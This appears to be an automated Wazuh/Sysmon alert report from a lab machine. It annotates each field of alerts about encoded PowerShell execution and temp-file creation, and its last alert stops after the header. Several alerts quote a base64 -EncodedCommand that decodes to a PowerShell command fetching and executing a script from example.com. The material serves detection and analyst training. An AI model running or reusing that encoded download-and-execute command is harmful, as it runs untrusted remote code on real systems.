🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:39:58.972+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:39:58.972+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  97
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534398.1935668
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:39:56.4053078Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285565
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:39:55.189 ProcessGuid: {94294ddc-bdbb-680a-b90b-000000000e00} ProcessId: 12340 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bdb8-680a-b70b-000000000e00} ParentProcessId: 3664 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:39:55.189
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bdbb-680a-b90b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12340
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bdb8-680a-b70b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  3664
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:39:58.987+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:39:58.987+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  101
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534398.1943735
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:39:56.6620358Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285566
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:39:56.644 ProcessGuid: {94294ddc-bdbb-680a-b90b-000000000e00} ProcessId: 12340 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_pk3v0v2m.0ww.ps1 CreationUtcTime: 2025-04-24 22:39:56.644 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:39:56.644
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bdbb-680a-b90b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12340
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_pk3v0v2m.0ww.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:39:56.644
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:40:01.598+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:40:01.598+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  98
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534401.1946504
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:39:58.8999675Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285635
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:39:57.681 ProcessGuid: {94294ddc-bdbd-680a-bb0b-000000000e00} ProcessId: 10672 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bdbb-680a-b90b-000000000e00} ParentProcessId: 12340 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:39:57.681
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bdbd-680a-bb0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  10672
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bdbb-680a-b90b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  12340
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:40:01.625+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:40:01.625+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  102
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534401.1954575
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:39:59.2948251Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285636
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:39:59.125 ProcessGuid: {94294ddc-bdbd-680a-bb0b-000000000e00} ProcessId: 10672 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_1bx1rwm3.pc4.ps1 CreationUtcTime: 2025-04-24 22:39:59.125 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:39:59.125
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bdbd-680a-bb0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  10672
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_1bx1rwm3.pc4.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:39:59.125
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:40:04.384+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
